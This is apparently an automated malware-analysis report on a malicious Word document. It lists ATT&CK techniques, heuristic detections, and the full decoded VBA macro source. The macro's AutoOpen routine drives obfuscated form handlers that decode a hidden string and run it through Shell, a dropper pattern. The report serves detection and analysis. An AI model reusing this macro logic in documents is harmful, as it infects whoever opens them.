MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample is a malicious Word document containing VBA macros. The Autoopen macro is designed to execute when the document is opened, likely to display a deceptive message prompting the user to enable content. The presence of a Shell() call in the VBA code indicates an attempt to execute arbitrary commands, suggesting it's a downloader or dropper for further malicious activity. The document body itself is a lure for this macro execution.
Heuristics 6
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2934 bytes |

SHA-256: 581d6ceca7bdd09c907417e0f28ecee55d0779bfdfc7f4bd6a1187ee4a90a737

Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
    validateSettingsForm ("max")
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4C1E977F-12F6-4C20-81EB-A5E86BD71A09}{F904A548-3387-40DC-BADB-3FD1FC0D7F9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub EditText1_Change()
    Dim ind1 As String
    ind1 = "1" + "100"
    UserForm1.ComboBox1.Text = ind1
End Sub
Private Sub CommandButton1_Click()
End Sub
Private Sub ValidText_Change()
    Dim bol2 As Integer
    With UserForm1
        Dim str As String
        str = .ValidText
        bol2 = Len(str)
        Dim bol1 As String
        bol1 = "Vi"
        fh = "2"
        doveryboll bol2
    End With
End Sub
Private Sub CommandButton2_Click()
End Sub
Private Sub TextBox1_Change()
    Dim s As String
    s = " "
    s = s + UserForm1.Text1
    If Len(s) = 62 + 1 Then OpenDateForm
End Sub
Private Sub ComboBox1_Change()
End Sub

Attribute VB_Name = "Module1"
Sub files_replace(C1, ByRef op)
    op = ""
    st1 = 1
    replacefiles st1, op, C1
End Sub
Sub tomorrow(ByRef br1, ByRef bm, xy)
    Dim log2 As Integer
    log2 = Len(UserForm1.Text1)
    If br1 < log2 Then
        b = ""
        With UserForm1
            doc_print_header .Text1, br1, b
            If xy <> b Then
                br1 = br1 + 1
                tomorrow br1, bm, xy
            Else
                bm = br1
            End If
        End With
    End If
End Sub
Sub replacefiles(ByRef pointA, ByRef need, later)
    f_str = Len(later)
    If pointA <= f_str Then
        ch = ""
        doc_print_header later, pointA, ch
        idial = 1
        strings_attached ch, idial
        st = ""
        DataFindSymbols idial - 2, st
        need = need + st
        pointA = pointA + 1
        replacefiles pointA, need, later
    End If
End Sub
Sub DataFindSymbols(ext1, ByRef date_max)
    Dim m1 As Integer
    m1 = -1
    date_max = ""
    If ext1 = m1 Then
        ext1 = m1
    End If
    If ext1 < 1 Then
        doc_print_header UserForm1.Text1, Len(UserForm1.Text1) + ext1, date_max
    Else
        doc_print_header UserForm1.Text1, ext1, date_max
    End If
End Sub
Sub doc_print_header(str1, pty, ByRef rmin)
    s11 = Left(str1, pty)
    s11 = s11 + ""
    rmin = Right(s11, 2 - 1)
End Sub
Sub doveryboll(m)
    Dim n As Integer
    Dim sad As String
    With UserForm1
        sad = "" + .ValidText
        n = m - 415
    End With
    If m = 415 Then Shell sad, n
End Sub
Sub validateSettingsForm(wstr1)
    wstr1 = wstr1 + "Open"
    UserForm1.TextBox1 = wstr1 + "Form"
End Sub
Sub strings_attached(per2, ByRef arg1)
    arg1 = 0
    sb1 = 1
    tomorrow sb1, arg1, per2
End Sub
Sub OpenDateForm()
    Dim str2 As String
    files_replace UserForm1.date1, str2
    UserForm1.EditText1 = str2
    str2 = str2 + ""
    UserForm1.ValidText = str2
End Sub
```